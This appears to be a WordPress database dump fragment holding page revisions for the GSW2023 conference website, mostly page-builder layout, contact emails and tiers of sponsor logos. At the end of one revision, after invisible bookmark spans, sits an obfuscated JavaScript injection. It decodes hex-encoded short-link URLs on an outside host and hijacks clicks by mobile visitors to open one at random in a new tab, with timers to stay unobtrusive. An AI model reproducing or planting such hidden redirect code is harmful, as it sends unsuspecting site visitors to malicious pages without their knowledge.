link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:26:52','2023-08-26 20:26:52','',3066,'https://gsw2023.com/?p=5408',0,'revision','',0),
(5410,1,'2023-08-26 20:28:16','2023-08-26 20:28:16','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" 